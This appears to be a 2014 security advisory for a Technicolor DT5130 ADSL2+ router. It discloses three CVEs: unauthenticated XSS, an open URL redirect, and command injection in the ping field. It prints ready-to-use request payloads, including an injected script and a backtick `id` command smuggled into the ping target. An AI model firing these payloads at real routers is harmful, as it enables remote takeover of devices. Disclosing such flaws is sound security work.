ADSL2+ 2.05.C29GV XSS / URL Redirect / Command Injection

2014.12.04

Credit: Ewerson

Risk: High

Local: No

Remote: Yes

CVE: CVE-2014-9142 | CVE-2014-9143 | CVE-2014-9144

CWE: CWE-79
CWE-78

Product: Wireless N ADSL 2/2+ Modem Router
Firmware Version : V2.05.C29GV
Modem Type : ADSL2+ Router
Modem Vendor : Technicolor
Model: DT5130
Bugs:
1- Unauth Xss - CVE-2014-9142
user=teste&password=teste&
userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login
2- Arbitrari URL redirect - CVE-2014-9143
failrefer=http://blog.dclabs.com.br&login=Login&password=
pass&refer=/index.html&user=1&userlevel=15
3- Command Injection in ping field - CVE-2014-9144
setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE
--
Ewerson Guimaraes (Crash)
Pentester/Researcher
DcLabs / Ibliss Security Team
www.dclabs.com.br / www.ibliss.com.br

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ADSL2+ 2.05.C29GV XSS / URL Redirect / Command Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.